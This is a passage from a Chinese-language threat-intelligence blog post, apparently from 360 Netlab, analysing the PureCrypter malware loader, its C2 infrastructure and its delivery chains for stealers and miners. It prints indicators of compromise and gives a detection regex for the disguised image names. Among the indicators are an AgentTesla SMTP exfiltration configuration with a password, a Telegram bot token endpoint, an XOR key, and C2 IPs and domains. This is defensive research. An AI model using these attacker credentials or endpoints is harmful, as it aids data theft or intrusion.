<p>&#x5982;&#x679C;&#x5206;&#x6790;&#x8FD8;&#x539F;&#x597D;&#x7684;injector&#xFF0C;&#x4F1A;&#x53D1;&#x73B0;&#x666E;&#x904D;&#x505A;&#x4E86;&#x6DF7;&#x6DC6;&#x5904;&#x7406;&#xFF0C;&#x5DEE;&#x522B;&#x53EA;&#x662F;&#x6DF7;&#x6DC6;&#x7A0B;&#x5EA6;&#x7684;&#x5927;&#x5C0F;&#x3002;&#x4E0B;&#x9762;&#x662F;&#x4E00;&#x4F8B;SmartAssembly&#x6DF7;&#x6DC6;&#x5E76;&#x4E14;&#x8D44;&#x6E90;&#x90E8;&#x5206;&#x88AB;&#x52A0;&#x5BC6;&#x7684;injector&#xFF1A;</p>
<p><img src="https://blog.netlab.360.com/content/images/2022/08/Image--17-.png" alt="Image--17-" loading="lazy"></p>
<p>&#x5982;&#x4E0A;&#x56FE;&#x6240;&#x793A;&#xFF0C;&#x9996;&#x5148;&#x901A;&#x8FC7;Reverse + GZip + Protubuf.Deserialize&#x7EC4;&#x5408;&#x62F3;&#xFF0C;&#x83B7;&#x53D6;&#x76F8;&#x5173;&#x914D;&#x7F6E;&#x4FE1;&#x606F;&#xFF0C;&#x4E4B;&#x540E;&#x662F;&#x6839;&#x636E;&#x914D;&#x7F6E;&#x68C0;&#x67E5;&#x8FD0;&#x884C;&#x73AF;&#x5883;&#x3001;&#x5BF9;&#x6297;&#x6C99;&#x7BB1;&#x3001;&#x521B;&#x5EFA;&#x4E92;&#x65A5;&#x4F53;&#x3001;&#x6301;&#x4E45;&#x5316;&#x7B49;&#xFF0C;&#x6700;&#x540E;&#x4ECE;&#x8D44;&#x6E90;&#x4E2D;&#x83B7;&#x53D6;payload&#x52A0;&#x8F7D;&#x8FD0;&#x884C;&#x3002;&#x8BE5;&#x6837;&#x672C;&#x6CA1;&#x6709;&#x8FDB;&#x5165;&#x4EFB;&#x4F55;&#x4E00;&#x4E2A;if&#x8BED;&#x53E5;&#xFF0C;&#x5F88;&#x5FEB;&#x5230;&#x4E86;&#x6700;&#x540E;&#x4E00;&#x4E2A;&#x91CD;&#x8981;&#x51FD;&#x6570;&#xFF0C;&#x8BE5;&#x51FD;&#x6570;&#x4E3B;&#x8981;&#x5B9E;&#x73B0;&#x6700;&#x7EC8;payload&#x7684;&#x6CE8;&#x5165;&#x3002;&#x6839;&#x636E;&#x914D;&#x7F6E;&#x7684;&#x4E0D;&#x540C;&#x5B58;&#x5728;4&#x79CD;&#x6CE8;&#x5165;&#x65B9;&#x5F0F;&#xFF0C;&#x5080;&#x5121;&#x8FDB;&#x7A0B;&#xFF08;Process Hollowing&#xFF09;&#x662F;&#x88AB;&#x6700;&#x591A;&#x4F7F;&#x7528;&#x7684;&#x65B9;&#x5F0F;&#x3002;</p>
<p><img src="https://blog.netlab.360.com/content/images/2022/08/image.png" alt="image" loading="lazy"></p>
<p>&#x6700;&#x7EC8;payload&#x5B58;&#x50A8;&#x5728;&#x8D44;&#x6E90;&#x4E2D;&#xFF0C;&#x89E3;&#x5BC6;&#x540E;&#x7684;&#x8D44;&#x6E90;&#x5982;&#x4E0B;&#x56FE;&#xFF1A;</p>
<p><img src="https://blog.netlab.360.com/content/images/2022/08/Image--18-.png" alt="Image--18-" loading="lazy"></p>
<p>&#x7ECF;&#x8FC7;Reverse + GZip&#x89E3;&#x538B;&#x7F29;&#x540E;&#x521B;&#x5EFA;&#x5080;&#x5121;&#x8FDB;&#x7A0B;&#x542F;&#x52A8;&#x6700;&#x7EC8;&#x7684;payload&#x3002;</p>
<p><img src="https://blog.netlab.360.com/content/images/2022/08/Image--19-.png" alt="Image--19-" loading="lazy"></p>
<p>&#x4E0A;&#x9762;&#x6700;&#x7EC8;&#x63A8;&#x5E7F;&#x7684;payload&#x4E3A;AgentTesla&#xFF0C;&#x5176;&#x914D;&#x7F6E;&#x4FE1;&#x606F;&#x5982;&#x4E0B;&#xFF1A;</p>
<pre><code>host: raphaellasia.com
port:587
username: origin@raphaellasia.com
pwd: student@1980
to: origin2022@raphaellasia.com
</code></pre>
<h2 id>&#x610F;&#x5916;&#x53D1;&#x73B0;</h2>
<p>PureCrypter&#x559C;&#x6B22;&#x5C06;injector&#x4F2A;&#x88C5;&#x6210;&#x56FE;&#x7247;&#x4F9B;downloader&#x4E0B;&#x8F7D;&#xFF0C;&#x56FE;&#x7247;&#x540D;&#x6BD4;&#x8F83;&#x968F;&#x673A;&#xFF0C;&#x5177;&#x6709;&#x660E;&#x663E;&#x673A;&#x5668;&#x751F;&#x6210;&#x7684;&#x7279;&#x70B9;&#x3002;&#x4E0B;&#x9762;&#x662F;&#x5B9E;&#x9645;&#x68C0;&#x6D4B;&#x5230;&#x7684;&#x4E00;&#x4E9B;&#x56FE;&#x7247;&#x540D;&#x3002;</p>
<pre><code># pattern 1
/dl/0414/net_Gzhsuovx.bmp
/dl/0528/mars2_Hvvpvuns.bmp
/dl/0528/az_Tsrqixjf.bmp

# pattern 2
/040722/azne_Bvaquebo.bmp
/04122022/net_Ygikzmai.bmp
/04122022/azne_Jzoappuq.bmp
/04122022/pm_Dxjlqugu.bmp
/03252022/azne_Rmpsyfmd.bmp

# pattern 3
/Rrgbu_Xruauocq.png
/Gepstl_Mouktkmu.bmp
/Zhyor_Uavuxobp.png
/Xgjbdziy_Kglkvdfb.png
/Ankwgqtwf_Bdevsqnz.bmp
/Osgyjgne_Ymgrebdt.png
/Rrgbu_Xruauocq.png
/Gepstl_Mouktkmu.bmp
/Osgyjgne_Ymgrebdt.png
/Osgyjgne_Ymgrebdt.png
/Zhyor_Uavuxobp.png

</code></pre>
<p>&#x5728;&#x5BF9;&#x591A;&#x4E2A;&#x6837;&#x672C;&#x8FDB;&#x884C;&#x5206;&#x6790;&#x540E;&#xFF0C;&#x6211;&#x4EEC;&#x53D1;&#x73B0;&#x8BF7;&#x6C42;&#x7684;&#x56FE;&#x7247;&#x540D;&#x4E0E;downloader&#x7684;AssmblyName&#x5B58;&#x5728;&#x5BF9;&#x5E94;&#x5173;&#x7CFB;&#x3002;</p>
<table>
<thead>
<tr>
<th>&#x56FE;&#x7247;&#x540D;</th>
<th>AssmblyName</th>
</tr>
</thead>
<tbody>
<tr>
<td>Belcuesth_Ipdtbadv.png</td>
<td>Belcuesth</td>
</tr>
<tr>
<td>Kzzlcne_Prgftuxn.png</td>
<td>Kzzlcne</td>
</tr>
<tr>
<td>newminer2_Jrltkmeh.jpg</td>
<td>newminer2</td>
</tr>
<tr>
<td>Belcuesth_Ipdtbadv.png</td>
<td>Belcuesth</td>
</tr>
<tr>
<td>Nykymad_Bnhmcpqo.bmp</td>
<td>Nykymad</td>
</tr>
<tr>
<td>my_ori_Ywenb_Yzueqpjp.bmp</td>
<td>my ori Ywenb</td>
</tr>
</tbody>
</table>
<p>&#x4E0B;&#x5212;&#x7EBF;&#x540E;&#x9762;&#x7684;&#x5185;&#x5BB9;&#x603B;&#x662F;&#x7B26;&#x5408;&#x6B63;&#x5219;&#x8868;&#x8FBE;&#x5F0F;</p>
<blockquote>
<p>[A-Z][a-zA-Z]{7}</p>
</blockquote>
<p>&#x57FA;&#x4E8E;&#x8FD9;&#x4E2A;&#x53D1;&#x73B0;&#x53EF;&#x4EE5;&#x7ED3;&#x5408;&#x6837;&#x672C;&#x548C;&#x7F51;&#x7EDC;&#x8BF7;&#x6C42;&#x4E24;&#x4E2A;&#x7EF4;&#x5EA6;&#x7684;&#x6570;&#x636E;&#x786E;&#x8BA4;PureCrypter&#x7684;&#x4E0B;&#x8F7D;&#x884C;&#x4E3A;&#x3002;</p>
<h1 id="c2">C2&#x548C;&#x4F20;&#x64AD;&#x5206;&#x6790;</h1>
<p>PureCrypter&#x4ECA;&#x5E74;&#x4E00;&#x76F4;&#x5728;&#x6D3B;&#x8DC3;&#xFF0C;&#x6211;&#x4EEC;&#x5148;&#x540E;&#x68C0;&#x6D4B;&#x5230;&#x7684;C2 &#x57DF;&#x540D;&#x548C;IP&#x6709;200&#x591A;&#x4E2A;&#xFF0C;&#x4F20;&#x64AD;&#x7684;&#x5BB6;&#x65CF;&#x6570;10&#x591A;&#x79CD;&#x3002;&#x5728;&#x6211;&#x4EEC;&#x770B;&#x5230;&#x7684;&#x6848;&#x4F8B;&#x4E2D;&#xFF0C;&#x4F20;&#x64AD;&#x94FE;&#x6761;&#x666E;&#x904D;&#x6BD4;&#x8F83;&#x957F;&#xFF0C;PureCrypter&#x7684;downloader&#x6A21;&#x5757;&#x7ECF;&#x5E38;&#x8DDF;&#x5404;&#x79CD;&#x5176;&#x5B83;&#x7C7B;&#x578B;&#x7684;&#x524D;&#x7F6E;downloader&#x914D;&#x5408;&#x4F7F;&#x7528;&#x3002;&#x56E0;&#x4E3A;C2&#x592A;&#x591A;&#xFF0C;&#x8FD9;&#x91CC;&#x4E3B;&#x8981;&#x4EE5;<code>185.215.113.89</code> &#x4E3A;&#x4F8B;&#x4ECE;&#x89C4;&#x6A21;&#x548C;&#x4F20;&#x64AD;&#x624B;&#x6CD5;&#x65B9;&#x9762;&#x505A;&#x4E00;&#x4E2A;&#x4ECB;&#x7ECD;&#x3002;</p>
<h2 id="c2">C2&#x5206;&#x6790;</h2>
<p>&#x8FD9;&#x4E2A;C2&#x5728;&#x6211;&#x4EEC;&#x68C0;&#x6D4B;&#x5230;&#x7684;C2&#x4E2D;&#x6D3B;&#x8DC3;&#x5EA6;&#x6BD4;&#x8F83;&#x9AD8;&#xFF0C;&#x5176;&#x6D3B;&#x8DC3;&#x65F6;&#x95F4;&#x4E3A;&#x4ECA;&#x5E74;4&#x6708;&#x4E2D;&#x65EC;&#x5230;6&#x6708;&#x521D;&#xFF0C;&#x5982;&#x4E0B;&#x56FE;&#x6240;&#x793A;&#x3002;</p>
<p><img src="https://blog.netlab.360.com/content/images/2022/08/xmon_185.215.113.89_ganwang.png" alt="xmon_185.215.113.89_ganwang" loading="lazy"></p>
<p>&#x5176;&#x6D3B;&#x8DC3;&#x7A0B;&#x5EA6;&#x53EF;&#x4EE5;&#x7528;&#x6211;&#x4EEC;&#x7684;&#x56FE;&#x7CFB;&#x7EDF;&#x76F4;&#x89C2;&#x53CD;&#x6620;&#x51FA;&#x6765;&#x3002;</p>
<p><img src="https://blog.netlab.360.com/content/images/2022/08/domain_ip_of_butler_202205-1.png" alt="domain_ip_of_butler_202205-1" loading="lazy"></p>
<p>&#x80FD;&#x770B;&#x5230;&#x5B83;&#x5173;&#x8054;&#x5230;&#x4E86;&#x6BD4;&#x8F83;&#x591A;&#x7684;&#x57DF;&#x540D;&#x548C;IP&#xFF0C;&#x4E0B;&#x9762;&#x662F;&#x8BE5;IP&#x5728;&#x8FD9;&#x6BB5;&#x65F6;&#x95F4;&#x7684;&#x90E8;&#x5206;&#x57DF;&#x540D;&#x89E3;&#x6790;&#x60C5;&#x51B5;&#x3002;</p>
<pre><code>2022-04-14 22:47:34	2022-07-05 00:42:16	22	rockrock.ug	A	185.215.113.89	
2022-04-21 08:22:03	2022-06-13 09:17:50	15	marnersstyler.ug	A	185.215.113.89	
2022-04-17 03:17:41	2022-06-10 04:31:27	2538	qwertzx.ru	A	185.215.113.89	
2022-04-24 02:16:46	2022-06-09 00:11:24	3	hubvera.ac.ug	A	185.215.113.89	
2022-04-15 23:47:43	2022-06-08 19:24:59	43	timekeeper.ug	A	185.215.113.89	
2022-04-15 11:34:35	2022-06-08 19:24:59	35	boundertime.ru	A	185.215.113.89	
2022-04-14 23:01:50	2022-06-08 15:33:25	24	timebound.ug	A	185.215.113.89	
2022-04-15 21:58:54	2022-06-08 05:43:21	7	www.rockrock.ug	A	185.215.113.89	
2022-04-16 20:50:41	2022-06-08 01:44:01	54	beachwood.ug	A	185.215.113.89	
2022-04-23 16:23:41	2022-06-07 18:30:51	5	asdsadasrdc.ug	A	185.215.113.89	
2022-05-02 22:35:40	2022-06-07 04:34:12	17	leatherlites.ug	A	185.215.113.89	
2022-05-29 17:46:00	2022-06-07 03:50:36	3	underdohg.ac.ug	A	185.215.113.89	
2022-04-15 22:34:53	2022-06-07 03:33:10	18	rockphil.ac.ug	A	185.215.113.89	
2022-04-15 03:09:13	2022-06-07 03:19:50	14	pdshcjvnv.ug	A	185.215.113.89	
2022-04-15 03:04:12	2022-06-07 03:12:04	16	mistitis.ug	A	185.215.113.89	
2022-04-16 03:08:46	2022-06-07 03:08:48	18	nicoslag.ru	A	185.215.113.89	
2022-04-19 02:33:31	2022-06-07 02:37:08	16	danwisha.ac.ug	A	185.215.113.89	
2022-05-28 23:56:02	2022-06-05 05:14:50	7	underdohg.ug	A	185.215.113.89	
2022-05-10 14:44:28	2022-06-02 17:40:12	24	jonescourtney.ac.ug	A	185.215.113.89	
2022-06-02 07:44:25	2022-06-02 07:44:25	1	triathlethe.ug	A	185.215.113.89	
2022-04-24 03:05:38	2022-06-01 16:54:59	2191	qwertasd.ru	A	185.215.113.89	
2022-04-17 09:34:27	2022-06-01 01:42:07	2	partaususd.ru	A	185.215.113.89	
2022-04-25 00:08:53	2022-05-31 07:17:00	5	timecheck.ug	A	185.215.113.89	
2022-04-21 02:36:41	2022-05-31 01:20:37	21	courtneyjones.ac.ug	A	185.215.113.89	
2022-04-16 19:09:02	2022-05-31 01:02:02	14	marksidfgs.ug	A	185.215.113.89	
2022-04-25 03:01:15	2022-05-30 03:04:29	10	mofdold.ug	A	185.215.113.89	
2022-04-15 02:36:21	2022-05-30 02:32:53	17	check-time.ru	A	185.215.113.89	
2022-04-18 02:21:26	2022-05-30 02:22:30	17	agenttt.ac.ug	A	185.215.113.89	
2022-04-17 03:17:46	2022-05-29 03:17:26	15	qd34g34ewdfsf23.ru	A	185.215.113.89	
2022-04-19 02:25:06	2022-05-29 02:22:57	14	andres.ug	A	185.215.113.89	
2022-04-16 02:27:44	2022-05-29 02:22:47	16	asdasgs.ug	A	185.215.113.89	
</code></pre>
<p>&#x7B2C;3&#x5217;&#x4E3A;&#x8BBF;&#x95EE;&#x91CF;&#xFF0C;&#x4E0D;&#x540C;&#x57DF;&#x540D;&#x8BBF;&#x95EE;&#x91CF;&#x6709;&#x5DEE;&#x522B;&#xFF0C;&#x6574;&#x4F53;&#x8BC4;&#x4F30;&#x5E94;&#x8BE5;&#x5728;&#x5343;&#x7EA7;&#xFF0C;&#x800C;&#x8FD9;&#x53EA;&#x662F;&#x6211;&#x4EEC;&#x770B;&#x5230;&#x7684;&#x4F17;&#x591A;C2&#x4E2D;&#x7684;&#x4E00;&#x4E2A;&#x3002;</p>
<p>&#x901A;&#x8FC7;&#x5173;&#x8054;&#x5206;&#x6790;&#xFF0C;&#x6211;&#x4EEC;&#x53D1;&#x73B0;<code>185.215.113.89</code>&#x7ECF;&#x5E38;&#x8DDF;<code>62.204.41.69</code>(3&#x6708;)&#x548C;<code>45.143.201.4</code>&#xFF08;6&#x6708;&#xFF09;&#x8FD9;&#x4E24;&#x4E2A;C2&#x914D;&#x5408;&#x4F7F;&#x7528;&#xFF0C;&#x5B83;&#x4EEC;&#x5173;&#x7CFB;&#x53EF;&#x4EE5;&#x7528;&#x4E0B;&#x56FE;&#x5173;&#x8054;&#x3002;</p>
<p><img src="https://blog.netlab.360.com/content/images/2022/08/Image--21--2.png" alt="Image--21--2" loading="lazy"></p>
<h2 id>&#x4F20;&#x64AD;&#x5206;&#x6790;</h2>
<p>PureCrypter&#x91C7;&#x7528;&#x4E86;downloader+injector&#x7684;&#x53CC;&#x6A21;&#x5757;&#x673A;&#x5236;&#xFF0C;&#x524D;&#x8005;&#x88AB;&#x4F20;&#x64AD;&#x540E;&#x518D;&#x4F20;&#x64AD;&#x540E;&#x8005;&#xFF0C;&#x76F8;&#x5F53;&#x4E8E;&#x5728;&#x4F20;&#x64AD;&#x94FE;&#x6761;&#x4E0A;&#x589E;&#x52A0;&#x4E86;&#x4E00;&#x73AF;&#xFF0C;&#x52A0;&#x4E0A;&#x4F5C;&#x8005;&#x60EF;&#x7528;&#x56FE;&#x7247;&#x540D;&#x540E;&#x7F00;&#x3001;&#x7F16;&#x7801;&#x4F20;&#x8F93;&#x7B49;&#x624B;&#x6BB5;&#x9690;&#x85CF;injector&#xFF0C;&#x8FD9;&#x4E9B;&#x672C;&#x8EAB;&#x5C31;&#x5DF2;&#x8DB3;&#x591F;&#x590D;&#x6742;&#x3002;&#x800C;&#x4F5C;&#x8005;&#x5728;downloader&#x4F20;&#x64AD;&#x8FD9;&#x5757;&#x4E5F;&#x4E0B;&#x4E86;&#x4E0D;&#x5C11;&#x529F;&#x592B;&#xFF0C;&#x6211;&#x4EEC;&#x770B;&#x5230;&#x7684;&#x6709;&#x901A;&#x8FC7;bat2exe&#x6346;&#x7ED1;&#x7834;&#x89E3;&#x8F6F;&#x4EF6;&#x7684;&#x65B9;&#x5F0F;&#x3001;&#x4F7F;&#x7528;VBS&#x548C;powershell&#x811A;&#x672C;loader&#x7684;&#x65B9;&#x5F0F;&#x3001;&#x7ED3;&#x5408;Godzilla&#x524D;&#x7F6E;loader&#x7B49;&#x591A;&#x79CD;&#x65B9;&#x5F0F;&#xFF0C;&#x8FD9;&#x4E9B;&#x64CD;&#x4F5C;&#x53E0;&#x52A0;&#x8D77;&#x6765;&#x7684;&#x7ED3;&#x679C;&#x5C31;&#x662F;PureCrypter&#x7684;&#x4F20;&#x64AD;&#x94FE;&#x6761;&#x666E;&#x904D;&#x8F83;&#x6DF1;&#x8F83;&#x590D;&#x6742;&#x3002;&#x5728;5&#x6708;&#x4EFD;&#x6211;&#x4EEC;&#x751A;&#x81F3;&#x53D1;&#x73B0;&#x901A;&#x8FC7;PureCrypter&#x4F20;&#x64AD;Raccoon&#xFF0C;&#x540E;&#x8005;&#x8FDB;&#x4E00;&#x6B65;&#x4F20;&#x64AD;Azorult&#x3001;Remcos&#x3001;PureMiner&#x3001;PureClipper&#x7684;&#x6848;&#x4F8B;&#x3002;</p>
<p><img src="https://blog.netlab.360.com/content/images/2022/08/PC-RACCOON-OTHER.png" alt="PC-RACCOON-OTHER" loading="lazy"></p>
<p>&#x4E0B;&#x9762;&#x4ECB;&#x7ECD;&#x51E0;&#x4E2A;&#x5178;&#x578B;&#x4F20;&#x64AD;&#x624B;&#x6CD5;&#x3002;</p>
<h3 id="1bat2exepowershellvbsmeteoritepurecryptermarsstealer">1&#xFF0C;&#x201C;Bat2Exe+Powershell+VBS+Meteorite+PureCrypter&#x201D;&#x4F20;&#x64AD;Mars Stealer</h3>
<p>&#x8FD9;&#x4E2A;&#x4E3B;&#x8981;&#x5728;&#x4E00;&#x4E9B;&#x7834;&#x89E3;&#x8F6F;&#x4EF6;&#x4E0A;&#x6709;&#x89C1;&#x5230;&#xFF0C;downloader&#x6A21;&#x5757;&#x901A;&#x8FC7;Bat2Exe&#x6346;&#x7ED1;&#x5230;&#x524D;&#x8005;&#x8FDB;&#x884C;&#x4F20;&#x64AD;&#x3002;&#x5B9E;&#x9645;&#x8FD0;&#x884C;&#x65F6;&#x4FDD;&#x5B58;&#x5728;&#x8D44;&#x6E90;&#x4E2D;&#x7684;&#x6076;&#x610F;&#x6587;&#x4EF6;&#x88AB;&#x91CA;&#x653E;&#x5230;tmp&#x76EE;&#x5F55;&#x4E0B;&#xFF0C;&#x901A;&#x8FC7;start.bat&#x6765;&#x89E6;&#x53D1;&#x8FD0;&#x884C;&#x3002;&#x91CA;&#x653E;&#x5728;tmp&#x76EE;&#x5F55;&#x4E0B;&#x7684;&#x6587;&#x4EF6;&#x5F62;&#x5982;&#x4E0B;&#x56FE;&#xFF1A;</p>
<p><img src="https://blog.netlab.360.com/content/images/2022/08/Image--1-.png" alt="Image--1-" loading="lazy"></p>
<p>start.bat&#x547D;&#x4EE4;&#x5F62;&#x5982;&#xFF1A;</p>
<p><img src="https://blog.netlab.360.com/content/images/2022/08/Image--2-.png" alt="Image--2-" loading="lazy"></p>
<p>&#x5728;&#x6211;&#x4EEC;&#x5206;&#x6790;&#x7684;&#x6848;&#x4F8B;&#x4E2D;&#xFF0C;.lnk&#x6587;&#x4EF6;&#x88AB;&#x7528;&#x6765;&#x542F;&#x52A8;powershell&#x6267;&#x884C;&#x6076;&#x610F;&#x547D;&#x4EE4;&#x3002;</p>
<p><img src="https://blog.netlab.360.com/content/images/2022/08/Image--3-.png" alt="Image--3-" loading="lazy"></p>
<p>Powershell&#x89E3;&#x7801;&#x51FA;&#x4E00;&#x4E2A;base64&#x7F16;&#x7801;&#x7684;VBS loader&#xFF1A;</p>
<p><img src="https://blog.netlab.360.com/content/images/2022/08/Image--8-.png" alt="Image--8-" loading="lazy"></p>
<p>VBS loader&#x8FDB;&#x4E00;&#x6B65;&#x91CA;&#x653E;&#x4E00;&#x4E2A;downloader&#xFF0C;&#x5E76;&#x901A;&#x8FC7;shellcode&#x8FD0;&#x884C;&#x540E;&#x8005;&#x3002;&#x8BE5;downloader&#x7684;&#x654F;&#x611F;&#x4FE1;&#x606F;&#x90FD;&#x4FDD;&#x5B58;&#x5728;&#x8D44;&#x6E90;&#x4E2D;&#xFF0C;&#x5305;&#x62EC;&#x8FDB;&#x7A0B;&#x540D;&#x548C;download url&#xFF0C;&#x5982;&#x4E0B;&#x56FE;&#x6240;&#x793A;&#x3002;</p>
<p><img src="https://blog.netlab.360.com/content/images/2022/08/Image--28-.png" alt="Image--28-" loading="lazy"></p>
<p>&#x6839;&#x636E;&#x8FD0;&#x884C;&#x540E;&#x7684;&#x8FDB;&#x7A0B;&#x540D;&#x5C06;&#x8BE5;downloader&#x547D;&#x540D;&#x4E3A;<code>Meteorite</code>&#xFF0C;&#x4E0A;&#x56FE;&#x4E2D;&#x7684;url&#x5C31;&#x5BF9;&#x5E94;PureCrypter&#x7684;downloader&#x6A21;&#x5757;&#xFF0C;&#x5B8C;&#x6574;&#x7684;&#x901A;&#x4FE1;&#x8FC7;&#x7A0B;&#x5982;&#x4E0B;&#x56FE;&#xFF1A;</p>
<p><img src="https://blog.netlab.360.com/content/images/2022/08/25e6857acc38482a85b9863f5749d21a-----.png" alt="25e6857acc38482a85b9863f5749d21a-----" loading="lazy"></p>
<p>&#x6700;&#x7EC8;payload&#x4E3A;Mars Stealer&#xFF0C;c2: <code>rockrock.ug/gggate.php</code>&#xFF0C;&#x914D;&#x7F6E;&#x4FE1;&#x606F;&#x5982;&#x4E0B;:</p>
<p><img src="https://blog.netlab.360.com/content/images/2022/08/Image--24-.png" alt="Image--24-" loading="lazy"></p>
<h3 id="2vbspowershellpurecrypterpureminer">2&#xFF0C;&#x201C;VBS/Powershell + PureCrypter&#x201D; &#x4F20;&#x64AD;PureMiner</h3>
<p>&#x6D89;&#x53CA;&#x7684;C2&#x4E3A; <code>89.34.27.167</code>&#xFF0C;&#x5165;&#x53E3;&#x4E3A;&#x4E00;&#x4E2A;VBS&#x811A;&#x672C;&#x6216;&#x8005;Powershell&#x811A;&#x672C;&#xFF0C;&#x4E0B;&#x9762;&#x662F;VBS&#x811A;&#x672C;&#x7684;&#x4F8B;&#x5B50;&#x3002;</p>
<p><img src="https://blog.netlab.360.com/content/images/2022/08/Image--4-.png" alt="Image--4-" loading="lazy"></p>
<p>&#x7F51;&#x7EDC;&#x901A;&#x4FE1;&#x6D41;&#x91CF;&#x5982;&#x4E0B;&#xFF1A;</p>
<p><img src="https://blog.netlab.360.com/content/images/2022/08/VBS_CASE.png" alt="VBS_CASE" loading="lazy"></p>
<p>Powershell&#x811A;&#x672C;&#x5982;&#x4E0B;&#xFF1A;</p>
<p><img src="https://blog.netlab.360.com/content/images/2022/08/Image--25-.png" alt="Image--25-" loading="lazy"></p>
<p>Powershell&#x811A;&#x672C;&#x4E0B;&#x8F7D;&#x5E76;&#x8FD0;&#x884C;PureCrypter&#x7684;downloader&#x6A21;&#x5757;&#xFF0C;&#x540E;&#x8005;&#x7EE7;&#x7EED;&#x4E0B;&#x8F7D;injector&#xFF0C;&#x8FD9;&#x91CC;&#x6BD4;&#x8F83;&#x7279;&#x6B8A;&#x7684;&#x662F;&#x4F7F;&#x7528;Discord&#x6765;&#x5206;&#x53D1;injector:</p>
<p><img src="https://blog.netlab.360.com/content/images/2022/08/Image--26-.png" alt="Image--26-" loading="lazy"></p>
<p>&#x6700;&#x7EC8;&#x7684;payload&#x4E3A;PureMiner&#xFF0C;C2&#x5982;&#x4E0B;:</p>
<pre><code>185.157.160.214
pwn.oracleservice.top
pwn.letmaker.top

port: 8080, 8444
</code></pre>
<h3 id="3netdownloaderagentteslaredline">3&#xFF0C;&#x5229;&#x7528;&#x672A;&#x77E5;.NET downloader&#x4F20;&#x64AD; AgentTesla&#x3001;RedLine</h3>
<p>&#x8BE5;downloader&#x5BB6;&#x65CF;&#x672A;&#x77E5;&#xFF0C;&#x5176;&#x8FD0;&#x884C;&#x65F6;&#x540C;&#x6837;&#x5206;&#x4E3A;&#x591A;&#x4E2A;&#x9636;&#x6BB5;&#xFF0C;&#x5176;&#x4E2D;stage0&#x6A21;&#x5757;&#x8D1F;&#x8D23;&#x52A0;&#x8F7D;&#x8D44;&#x6E90;&#x4E2D;&#x7684;stage1&#x6076;&#x610F;&#x6A21;&#x5757;&#xFF1A;</p>
<p><img src="https://blog.netlab.360.com/content/images/2022/08/Image--5-.png" alt="Image--5-" loading="lazy"></p>
<p>stage1&#x6A21;&#x5757;&#x8FD0;&#x884C;&#x540E;&#x4F1A;&#x7EE7;&#x7EED;&#x52A0;&#x8F7D;&#x4E0B;&#x4E00;&#x9636;&#x6BB5;&#x6A21;&#x5757;stage2&#xFF1A;</p>
<p><img src="https://blog.netlab.360.com/content/images/2022/08/Image--6-.png" alt="Image--6-" loading="lazy"></p>
<p>stage2&#x6A21;&#x5757;&#x4E5F;&#x662F;&#x4E00;&#x4E2A;Crypter(&#x6682;&#x672A;&#x547D;&#x540D;)&#xFF0C;&#x4E0E;PureCrypter&#x4E0D;&#x540C;&#xFF0C;&#x4ED6;&#x8FD8;&#x63D0;&#x4F9B;&#x4E86;&#x4E0B;&#x8F7D;&#x529F;&#x80FD;&#xFF0C;&#x7528;&#x6765;&#x4E0B;&#x8F7D;&#x6076;&#x610F;PureCrypter&#x7684;downloader&#x6A21;&#x5757;&#xFF0C;&#x5373;&#x56FE;&#x4E2D;&#x7684;<code>puty.exe</code>&#x3002;</p>
<p><img src="https://blog.netlab.360.com/content/images/2022/08/Image--7-.png" alt="Image--7-" loading="lazy"></p>
<p>&#x4ECE;&#x8D44;&#x6E90;&#x4E2D;&#x5F02;&#x6216;&#x89E3;&#x5BC6;&#x6076;&#x610F;&#x8F6F;&#x4EF6;&#xFF0C;key&#x4E3A;<code>bnvFGkCKlnhQ</code>&#xFF0C;&#x76F8;&#x5173;&#x7B97;&#x6CD5;&#x5982;&#x4E0B;&#xFF1A;</p>
<p><img src="https://blog.netlab.360.com/content/images/2022/08/Image--29-.png" alt="Image--29-" loading="lazy"></p>
<p>&#x56E0;&#x6B64;&#x5B9E;&#x9645;&#x4F20;&#x64AD;&#x4E86;&#x4E24;&#x4E2A;&#x5BB6;&#x65CF;&#xFF1A;</p>
<p>stage2&#x7684;payload&#x4E3A;AgentTesla&#xFF0C;c2&#x4E3A; <code>https[:]//api.telegram.org/bot5421147975:AAGrsGnLOHZfFv7yHuj3hZdQSOVmPodIAVI/sendDocument</code></p>
<p>PureCrypter&#x7684;payload&#x4E3A;RedLine&#xFF0C;c2&#x4E3A;</p>
<pre><code>IP: workstation2022.ddns.net:62099
ID: cheat
</code></pre>
<h2 id>&#x603B;&#x7ED3;</h2>
<p>PureCrypter&#x662F;&#x4E00;&#x4E2A;&#x4ECD;&#x5728;&#x6D3B;&#x8DC3;&#x7684;MaaS&#x7C7B;&#x578B;&#x7684;botnet&#xFF0C;&#x5DF2;&#x7ECF;&#x4F20;&#x64AD;&#x4E86;10&#x591A;&#x79CD;&#x5F71;&#x54CD;&#x6BD4;&#x8F83;&#x5927;&#x7684;&#x5176;&#x5B83;&#x6076;&#x610F;&#x5BB6;&#x65CF;&#x3002;PureCrypter&#x7684;&#x4F20;&#x64AD;&#x624B;&#x6CD5;&#x666E;&#x904D;&#x6BD4;&#x8F83;&#x590D;&#x6742;&#xFF0C;&#x5176;&#x80CC;&#x540E;&#x5E94;&#x8BE5;&#x5B58;&#x5728;&#x81F3;&#x5C11;&#x4E00;&#x4E2A;&#x6BD4;&#x8F83;&#x4E13;&#x4E1A;&#x7684;&#x9ED1;&#x4EA7;&#x7EC4;&#x7EC7;&#xFF0C;&#x4ED6;&#x4EEC;&#x62E5;&#x6709;&#x8F83;&#x591A;&#x7684;&#x6280;&#x672F;&#x3001;&#x57DF;&#x540D;&#x548C;IP&#x8D44;&#x6E90;&#xFF0C;&#x9884;&#x8BA1;&#x4ECA;&#x540E;&#x4F1A;&#x7EE7;&#x7EED;&#x4F20;&#x64AD;&#x5176;&#x5B83;&#x7684;&#x6076;&#x610F;&#x5BB6;&#x65CF;&#x3002;&#x6211;&#x4EEC;&#x5BF9;PureCrypter&#x7684;&#x4F20;&#x64AD;&#x6D3B;&#x52A8;&#x4E00;&#x76F4;&#x6709;&#x8F83;&#x597D;&#x7684;&#x68C0;&#x6D4B;&#xFF0C;&#x4F1A;&#x7B2C;&#x4E00;&#x65F6;&#x95F4;&#x5C06;C2&#x7B49;&#x5A01;&#x80C1;&#x4FE1;&#x606F;&#x6DFB;&#x52A0;&#x5230;&#x6211;&#x4EEC;&#x7684;&#x5A01;&#x80C1;&#x60C5;&#x62A5;&#x5E93;&#x4E2D;&#x3002;&#x540E;&#x7EED;&#x6211;&#x4EEC;&#x4F1A;&#x7EE7;&#x7EED;&#x4FDD;&#x6301;&#x5173;&#x6CE8;&#xFF0C;&#x53CA;&#x65F6;&#x66F4;&#x65B0;&#x6700;&#x65B0;&#x7684;&#x5A